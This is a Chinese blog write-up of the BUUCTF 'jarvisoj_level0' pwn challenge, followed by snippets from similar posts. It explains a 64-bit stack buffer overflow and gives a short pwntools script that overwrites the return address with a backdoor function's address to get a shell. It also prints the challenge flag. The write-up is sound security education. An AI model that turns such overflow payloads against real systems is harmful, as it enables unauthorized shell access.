buuctf-jarvisoj_level0(pwn)题解

于 2025-02-18 15:53:11 发布
阅读量406 收藏 8
点赞数 10
分类专栏: pwn ctf 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81574836/article/details/145706960
版权

第一步:nc连接地址,查看是个什么情况

第二步:查文件的位数和保护情况

第三步:用ida打开查看主函数的意义

第四步:寻找后门函数,找到地址,查看偏移量

第五步:构造脚本,连接服务器拿到后门权限或者自己构造权限

下面看下我今天做的这个很简单的pwn题跟着上面的顺序走一遍

第一步:nc连接地址,看看可以直接执行命令吗

发现直接执行命令不太行,后面我们看看文件的保护情况和位数来确定用多少位的ida打开分析

第二步:查文件的位数和保护情况

发现是64位的,并且开了nx保护

第三步:用ida打开查看主函数的意义

用64位的ida打开后观察主函数

没啥可以用的地方,深入研究,查看返回的那个函数

这里有个char函数接受了输入,观察后面的注释应该用填充80个A,那么我们下面要找到后门的地址,用来链接从而完成对这个服务端的控制

第四步:找后门

我们可以shift+f12来查看一下字段,看看有没有后门的地址

发现一个/bin/sh字段,这个意思是开启控制台的意思,那么我们把栈用A填满后,将最后指向的地址指向这个函数的开始地址,那么我们就打开了控制台可以进行相应的操作

下面就是找一下/bin/sh的开始地址了,我们双击进去看看

发现了注释上说是从地址0x400596开始的,那么我们就可以开始编写脚本了

第五步:开始编写脚本

from pwn import * #这里是调用关于pwn要用到的库
p = remote("node5.buuoj.cn",27952) #创建连接
payload = b'a' * (0x80 + 8) +p64(0x400596) #构造payload,填充无用数据和最后的后门地址
p.sendline(payload) #发送payload到服务端
p.interactive() #持续连接,方便后面的控制

写完脚本后,就开始执行脚本看看

ls查看后发现了flag.txt文件我们cat它拿到flag


flag

flag{68a3f327-24ae-44fa-8e42-f1a1f9cc4be6}

BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 387
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 571
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 569
[buuctf]jarvisoj_level0
buuctf jarvisoj_level0
carol2358的博客
04-17 680
栈溢出,然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...
BUUCTF-Pwn-jarvisoj_level0
餐桌上的猫
02-12 372
题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 362
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 571
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF Pwn jarvisoj_level21解题步骤
2301_81505831的博客
02-04 384
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 380
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
buuctfjarvisoj_level0
weixin_54452942的博客
03-28 1493
64位(system_addr+1)的奥秘
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2425
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 650
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1149
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
[每日一PWN]BUUCTF jarvisoj_level0
qq_55233040的博客
11-23 221
依旧是基础的ret2text。
BUUCTF-PWN-jarvisoj_level0
m0_64180167的博客
04-15 138
发现buf 占80字节 加上64基地址的8字节 我们就需要0x88个字节填充满。果然就是输出hello world 然后输入。这道题也是栈溢出 但是有不同的函数。发现/bin/sh 漏洞代码。进去发现果然没有使用这个函数。放入ida64 查字符串。我们重新回到main函数。这样我们就可以栈溢出。我们可以开始写exp。
BUUCTF-PWN】6-jarvisoj_level0
最新发布
燕麦葡萄干的博客
07-05 280
buf变量长度为128,但是read可以读入0x200长度的字符,存在栈溢出,需要覆盖的长度为0x80+8。vulnerable_function()函数。64位,开启了NX保护。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值